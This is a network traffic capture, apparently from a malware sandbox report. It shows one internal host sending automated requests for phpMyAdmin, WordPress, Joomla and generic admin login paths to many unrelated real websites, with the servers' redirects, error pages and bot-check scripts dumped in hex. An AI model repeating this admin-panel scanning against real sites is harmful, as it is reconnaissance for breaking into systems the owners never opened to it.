Feb 21, 2024 00:26:12.716732025 CET	180	OUT	GET /phpmyadmin/ HTTP/1.1 Host: caspiantravel.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.907013893 CET	457	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 220 Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache Location: http://www.caspianseagulltravels.com Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 61 73 70 69 61 6e 73 65 61 67 75 6c 6c 74 72 61 76 65 6c 73 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.caspianseagulltravels.com">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
313	192.168.2.6	61667	221.121.158.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.748706102 CET	222	OUT	GET /wp-admin/ HTTP/1.1 Host: houseguru.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://houseguru.com.au/wp-login.php
Feb 21, 2024 00:26:13.051414013 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:12 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 31 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 Data Ascii: 515<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![])+(+![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[])+(+![]+[])+(+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])), x=function(){try{return !!window
Feb 21, 2024 00:26:13.051426888 CET	362	IN	Data Raw: 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 21 21 30 3b 7d 20 7d 2c 0a 20 20 20 20 20 20 20 20 79 3d 66 75 6e 63 74 69 6f 6e 28 79 2c 7a 29 7b 78 28 29 20 3f 20 64 6f 63 75 6d 65 6e 74 Data Ascii: .addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(function(){ document.getElementById('wsidchk').value =
Feb 21, 2024 00:26:13.051434040 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
314	192.168.2.6	62160	13.248.243.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.748821020 CET	183	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.859865904 CET	319	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/PhpMyAdmin/ vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:12 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Feb 21, 2024 00:26:13.066049099 CET	319	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/PhpMyAdmin/ vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:12 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
315	192.168.2.6	61961	162.241.216.197	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.770565987 CET	186	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: wilsonfamilyinsurance.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.208276987 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:13 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 7939 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://wilsonfamilyinsurance.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 Set-Cookie: PHPSESSID=778830249bd0e779849921820b42fe98; path=/ Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 72 6b 73 db b6 d6 f5 e7 78 a6 ff 01 66 a6 b1 d4 0a a4 6e be c9 a6 fb e4 a4 c9 79 72 a6 a7 e9 d3 a4 d3 f7 4c 92 c9 40 e4 26 09 1b 04 58 00 d4 a5 ae ff fb bb 41 5d 2c cb 94 ec c4 4e 8f e2 48 24 b0 f7 5a 6b af bd be d9 f9 66 e7 74 f7 c7 37 2f de fd e7 97 97 24 b3 b9 38 c3 03 f7 4b 04 93 69 e8 81 a4 bf bd f5 aa 43 60 b1 fb cd c1 32 12 65 4c 1b b0 a1 f7 db bb 57 f4 c8 23 c1 f2 26 b3 b6 a0 f0 47 c9 47 a1 f7 ff e8 6f cf e9 0b 95 17 cc f2 a1 00 8f 44 4a 5a 90 d8 f6 fa 65 08 71 0a de b2 4d b2 1c 42 6f c4 61 5c 28 6d 57 2a c7 3c b6 59 18 c3 88 47 40 ab 97 16 e1 92 5b ce 04 35 11 13 10 76 bc 33 f2 0d ce 41 c8 a9 e5 56 c0 d9 2f 2c 05 22 95 25 89 2a 65 4c 9e 3d 3d ea 76 3a 27 e4 77 2e 8c 92 e4 15 cb b9 98 92 d7 d2 94 9a c9 08 4e 83 59 d7 aa 90 3d ad 86 ca 9a bd a5 8c bd 9c 4d 28 cf 11 98 16 1a 9c cc 81 60 3a 85 3d 9c 7c e7 54 70 79 41 34 88 70 2f 96 c6 15 24 60 a3 6c 8f 64 f8 14 ee 05 81 b1 cc 1a 7f 5c f8 91 ca ef d7 91 20 af f1 53 a5 52 01 ac e0 e6 fe 9d a3 b6 3f 56 3a c6 0b f3 19 5d bc 5d 2f cf 63 c2 82 96 cc e2 f2 ec b4 c0 15 b1 a2 10 3c c2 85 2a 19 68 63 be 9f e4 02 af 9c 83 a1 b7 c1 61 f2 4c b3 3f 4a 75 42 5e 01 c4 de 8c d3 73 39 31 83 20 18 57 3d 49 d5 c2 17 1d 4e 49 90 60 75 e0 7d 4d 3d 18 cd 1c b7 6b 3e 53 58 34 6f 5b 51 f8 e4 c9 e9 2e a5 e4 5d c6 0d 31 dc 02 29 0d 18 62 33 20 ff ac 76 48 9e 4b 26 a6 96 47 86 0c a7 e4 df 4a 1a 1c 03 05 f1 34 43 fa 42 94 29 97 64 74 e4 77 fb 7e 9b 50 f2 9b e1 32 5d e9 b1 9a 45 17 ee 88 92 a5 bc f1 d8 cf 67 38 7c 8e 53 89 23 94 2e e5 fc ac 2c 0c 6e b1 a1 44 a9 2c 89 4a ad 71 0a 34 06 43 9e f0 b4 d4 10 13 74 cb 2e 66 f0 71 1c 98 4d a3 c6 12 34 91 38 2e 6a 51 84 95 38 99 b4 ce 76 20 63 6e b3 db 53 72 59 4d bf ce 6d c0 5a 9c 03 47 66 12 84 3f 17 fb 64 a9 f7 7a d2 48 c5 e0 ca 97 25 55 45 70 2f 3f e7 16 98 48 f3 c2 ce 73 62 61 62 83 73 36 62 b3 53 ef 6c 27 f8 8e 9c ee be 7f f1 e3 f3 77 cf df 93 ef 82 9d 31 97 b1 1a fb 9f c6 05 e4 ea 9c bf 5d 48 0d c9 a5 37 64 06 7e d3 c2 1b cc e3 f1 21 f8 10 18 7f ec 2b 9d 7e 08 78 ce 52 30 1f 30 17 1a 3e 04 55 f3 87 a0 83 9b f4 db 1f 82 c3 ee e4 b0 fb 21 f0 5a 1e 0a c0 7e bf 90 29 be 98 51 fa 65 78 d8 58 a1 e1 ef cb 19 20 3e b9 77 55 ea 08 bc c1 a5 87 eb 74 8b 71 6d 73 fc 0a 7e 63 9e f1 aa a0 5c 46 a2 8c 1d eb b9 a9 0e aa 7e aa 41 00 8e ee e7 5c fa e7 e6 87 11 e8 f0 c0 ef fb Data Ascii: rksxfnyrL@&XA],NH$Zkft7/$8KiC`2eLW#&GGoDJZeqMBoa\(mW<YG@[5v3AV/,"%eL==v:'w.NY=M(`:=\|TpyA4p/$`ld\ SR?V:]]/c<*hcaL?JuB^s91 W=INI`u}M=k>SX4o[Q.]1)b3 vHK&GJ4CB)dtw~P2]Eg8\|S#.,nD,Jq4Ct.fqM48.jQ8v cnSrYMmZGf?dzH%UEp/?Hsbabs6bSl'w1]H7d~!+~xR00>U!Z~)QexX >wUtqms~c\F~A\
Feb 21, 2024 00:26:13.208286047 CET	1286	IN	Data Raw: 3d ef ea ea 04 0d dc 9d 25 3e e1 b8 11 fc c5 5c 28 9a 02 66 05 f9 63 e7 e9 6e 52 ca c8 72 25 1b bc 25 9b 97 23 a6 89 6a 99 16 9c 2c ce 49 d4 80 e6 a5 d5 d3 ea ce 86 97 a6 2c 0a a5 ed 3b 30 d6 0c a0 65 79 8e 4f 2c 2f 06 0d 09 63 f2 23 02 37 fd 11 Data Ascii: =%>\(fcnRr%%#j,I,;0eyO,/c#7%I [4c`^7?j\!Ol^+QE94GBdVLbZ1mvXpjXnp*f)jrE>~$+MR<`K-C0m,5/~o?^5
Feb 21, 2024 00:26:13.208348036 CET	1286	IN	Data Raw: 4e 8d 9d 0a 20 3c 0e f7 c6 05 ad 3a 68 75 64 28 97 82 4b a0 91 31 7b c4 4e 0b 08 f7 2c 4c 6c e0 de cf 76 76 9e f0 3c 45 31 d4 e4 5c c0 b4 45 dc 6b d5 4e 2e 77 9e 3c 89 b9 29 04 9b 0e c8 0c 84 ec f2 dc 79 c6 a4 3d c1 db a1 d2 31 e8 01 91 aa e6 6a Data Ascii: N <:hud(K1{N,Llvv<E1\EkN.w<)y=1jBMpx@v3.rS.M~5OnVkU,cqDA{3{3}(TtAj33IY[`Q2aKSj&#<f.#Q`f47fK~yn-s
Feb 21, 2024 00:26:13.208422899 CET	1286	IN	Data Raw: 9d a1 9d b1 0d 95 8e 81 95 93 3b 98 70 04 1c ab 73 b0 7f 1d 0a 3c eb ef e3 5f 93 ec 2f c8 d1 a5 76 eb a0 7b ef 8c c6 a5 b9 b8 c7 88 bd 56 a7 d3 bd 1e f1 f8 b8 75 84 36 1f 77 af 99 0f f6 5b 47 18 9b f6 d1 5d d4 05 13 40 55 04 4c de cd db af b8 af Data Ascii: ;ps<_/v{Vu6w[G]@ULyVB}pGnNeh;G]/m4a{BhJMNl.!e> *t!l+,[e`)~_CWn)cIgT`En+9;Rr
Feb 21, 2024 00:26:13.208431005 CET	1286	IN	Data Raw: eb b2 c3 74 0a 5f 00 58 f5 d5 e0 4d be 18 71 52 87 b9 e3 63 f5 50 a8 e8 82 4a 36 e2 29 b3 5c 49 c2 06 e3 0c 34 34 06 52 d9 86 ab c0 45 e7 d5 f6 4a 6b 95 6c 36 2f 23 25 94 1e 10 2e b1 8e 3b 9c 79 c7 35 5c a1 8c a5 16 f2 42 30 0b 3e 77 4e 4c 55 69 Data Ascii: t_XMqRcPJ6)\I44REJkl6/#%.;y5\B0>wNLUii"`LY1 {S(nYaZV\|*J!(\|wj@3pauGw;psD=pOC5s.id4$^fm11F\L4r#(-B)eO4,"2j8\|
Feb 21, 2024 00:26:13.208446980 CET	1286	IN	Data Raw: f6 b4 dd 3b 3a 31 46 84 1d 8f 18 fe 27 98 d0 eb 75 27 bd ae 47 82 b3 9d ff 96 b8 ce b1 53 87 df 75 f2 f0 78 82 ff d7 05 b2 a2 10 40 ad 2a a3 8c fe bd 62 8f da 4e ec 51 fb 86 58 27 2e 07 cb 88 64 39 84 5e 6e 9c 3e 1e 31 cb 95 a4 ef b8 80 d7 39 4b Data Ascii: ;:1F'u'GSux@*bNQX'.d9^n>19K#sAg[:0H#JY{&J1hYK3 brsEVQPz@&t7/5Hynl9!jSj9w;\b&;(maaM
Feb 21, 2024 00:26:13.208457947 CET	741	IN	Data Raw: b9 fe d3 80 9d 55 99 df f9 ea ee f4 ee 76 a7 50 c6 7e 72 4f b7 0d 2a 58 0a 1b ec e9 d5 db f3 42 e5 05 93 1c cc 76 8f cc 36 93 82 68 01 12 78 67 4b c0 bf d1 b4 fe d7 32 ad 5f 6f da ff 95 ca de 11 aa ed 86 fd e1 00 d0 ac 0a e8 6f 34 6a ff 6b 19 b5 Data Ascii: UvP~rOXBv6hxgK2_oo4jk_o-Ab.[Ac/,zge5oA)H4lt4RJC*CEAp]!y)awo~q?+K^RNdoVO..U

Session ID	Source IP	Source Port	Destination IP	Destination Port
316	192.168.2.6	62217	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.773148060 CET	175	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.868432999 CET	225	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/PhpMyAdmin/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:13.072527885 CET	225	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/PhpMyAdmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
317	192.168.2.6	62218	104.21.66.152	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.773672104 CET	183	OUT	GET /administrator/index.php HTTP/1.1 Host: att.com.tw Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
318	192.168.2.6	62219	104.21.66.152	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.773724079 CET	183	OUT	GET /administrator/index.php HTTP/1.1 Host: att.com.tw Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
319	192.168.2.6	62173	217.70.184.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.831156015 CET	176	OUT	GET /admin HTTP/1.1 Host: network-abilities.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.996995926 CET	1167	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Content-Encoding: gzip Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 55 cd 72 db 36 10 be e7 29 50 5e 9c 4c 46 a4 29 d9 b1 d4 a1 98 49 ed 5a 4e 2b 8f 5c 3b b5 27 ba 68 40 70 45 c2 02 01 06 00 45 d1 a7 bc 46 5f af 4f d2 e5 8f 52 39 96 a6 9d f6 02 81 c0 b7 bb d8 6f bf 5d 05 3f 5c cc ce 3f 7d be f9 99 a4 36 13 e1 ab a0 fe 21 4c 50 63 c6 8e 54 bd 47 e3 10 41 65 32 06 19 be 22 24 48 81 c6 f5 06 b7 19 58 4a 58 4a b5 01 3b 76 0a bb ec 0d 9d dd 2b 49 33 18 3b 6b 0e 65 ae b4 75 08 53 d2 82 44 68 c9 63 9b 8e 63 58 73 06 bd e6 63 8f 5d 0c 86 69 9e 5b ae e4 8e e9 a7 94 1b 12 ab 8c 72 d9 e0 48 4a 0d 89 00 24 d1 90 70 63 41 43 4c 4a 6e 53 32 a1 32 e6 ae 04 eb 92 8f 96 a0 15 2b b4 46 1f a2 22 39 d5 2b 84 45 15 b1 29 10 55 4a d0 ee f6 05 96 5b 01 21 9a 95 4a af 7a 34 e2 82 5b 0e c6 65 2a 0b bc f6 b2 05 0a 2e 57 18 54 8c 1d 63 2b 01 26 05 c0 1c 6d 95 e3 db 2d 6c ac c7 0c 52 97 6a 58 8e 9d fa b9 bd b3 e1 f0 e4 64 70 7a ec d6 17 2f 9d a4 c8 11 2b f0 a5 ac 4e b8 b5 5b d2 75 fd e9 e2 b2 75 cd 33 9a 80 b7 e9 35 30 ef 85 9b 1c 57 45 63 87 50 2c df 12 59 fb e6 0a f7 c6 bb ae 57 d0 9a da de 2d 24 85 a0 da 2d d5 72 d9 df 7a af 51 5e 77 c2 b4 32 46 69 9e 70 f9 7f e2 dc 41 c6 7f 52 22 fe f7 81 02 6f 2b b2 20 52 71 d5 c5 8e f9 7a 2b cb 1b ac 1f 97 c9 0d 32 b1 e8 1f f7 07 3d ad 94 5d f4 e3 bc 30 c4 09 83 46 1c 1d 74 26 e2 3b 4b 2d 67 3b 40 ff c3 a4 f2 49 e7 64 e7 fc 4b 7a fd 5b 1f ed 31 52 18 50 8d 46 02 be 0b d9 a2 3b 35 2e 7c fd 61 78 86 06 a9 7f 20 5c a3 97 85 3f 60 f0 ab 13 fe 07 e9 22 13 7e b8 9b f9 f7 fe 51 67 8b c1 99 fc 32 7b 9e 4e 73 ee ff 32 af 50 68 41 8e c9 74 c5 49 ad cd cd 8f 9e 57 a6 8a 1b 37 d9 86 f1 40 7a 1a 4c 21 ac 79 6f 80 6a 96 8e f7 36 00 3a 33 56 2b 99 84 f7 d8 d4 4d f3 3c 5c cd 3e de 91 ce 98 a8 25 39 d0 39 9d 5d e0 d1 90 58 45 12 b0 8d 79 4b c7 9f 5f ff 30 24 2f 22 c1 59 c7 05 0a 07 fb 9e 70 b9 54 3a 6b f6 6e e0 61 22 5e 53 9b 97 52 68 d3 ce 95 e1 35 36 52 9b 45 7f 96 4c 53 e7 30 56 15 48 78 03 7c f4 87 b6 a6 69 2f 2c 52 3a 6e 71 fe a4 8c 16 35 03 39 95 7b a1 f5 63 6b e0 c5 75 bc b4 7f 53 f5 0f 84 44 9a a0 e8 51 19 85 a4 6b ca 05 8d 04 e0 2d 06 09 77 32 6e d7 fd 4f ac 9b d2 9c a3 24 91 49 d0 0b 7f b4 f1 99 13 3e 50 69 49 a5 0a 5d cf b7 5d d9 bd c7 90 de 1e 49 94 e5 73 41 b4 26 4e 38 45 41 48 92 29 0d 84 46 c8 da 4e dd 5a 19 a3 d6 40 1a a4 dd 90 12 48 46 25 b6 65 5d e7 36 ce 41 ba a2 c2 5a 25 17 8f a7 53 ae b7 b4 2a c9 50 03 ab fa 1f 42 c6 aa 74 85 62 6d f1 35 e4 82 32 78 4d ad 8a 5e 1f d1 ab db 63 76 75 fd 6e 5a 8d 9e e8 64 54 4e b3 38 8d b2 db 7c 9a 9d 8a f8 7c 24 22 3e 5a 45 7d 3f a5 0f 27 6b 36 b8 97 f3 fe fd 53 7c 31 7a 8a 06 f7 d5 e7 fe ef 23 36 b9 ac 68 5f 14 f3 6a fe 34 7f b8 c4 b3 64 74 f4 86 bc 25 47 7b 8b 75 f4 c6 21 5a 09 9c 5a 35 d5 38 c1 f0 56 c6 b0 19 3b c7 4e 78 89 5b 42 9f 11 62 78 86 75 d4 b5 ce 0f 15 bf 2d ef 4e 95 bb 71 f3 ad de b5 b7 ee a3 99 88 ed 20 c4 79 d0 fc 49 ff 05 75 b4 23 94 b5 07 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3aeUr6)P^LF)IZN+\;'h@pEEF_OR9o]?\?}6!LPcTGAe2"$HXJXJ;v+I3;keuSDhccXsc]i[rHJ$pcACLJnS22+F"9+E)UJ[!Jz4[e.WTc+&m-lRjXdpz/+N[uu350WEcP,YW-$-rzQ^w2FipAR"o+ Rqz+2=]0Ft&;K-g;@IdKz[1RPF;5.\|ax \?`"~Qg2{Ns2PhAtIW7@zL!yoj6:3V+M<\>%99]XEyK_0$/"YpT:kna"^SRh56RELS0VHx\|i/,R:nq59{ckuSDQk-w2nO$I>PiI]]IsA&N8EAH)FNZ@HF%e]6AZ%SPBtbm52xM^cvunZdTN8\|\|$">ZE}?'k6S\|1z#6h_j4dt%G{u!ZZ58V;Nx[Bbxu-Nq yIu#0

Session ID	Source IP	Source Port	Destination IP	Destination Port
320	192.168.2.6	62346	198.185.159.145	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.839252949 CET	167	OUT	GET /admin HTTP/1.1 Host: mwpmedia.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.959069967 CET	272	IN	HTTP/1.1 301 Moved Permanently Age: 0 Date: Tue, 20 Feb 2024 23:26:12 GMT Location: https://www.mwpmedia.com/admin Server: Squarespace Set-Cookie: crumb=BfvZJJnZwRb+MjZkODZhZjNiNjIzNTVjMTdkZGYwYTMzYjNlNzRi;Path=/ X-Contextid: eKjnRlwN/r0fEHGXG Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
321	192.168.2.6	62229	109.71.40.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.873146057 CET	168	OUT	GET /admin HTTP/1.1 Host: cpsgroupe.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.055280924 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:12 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 33 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 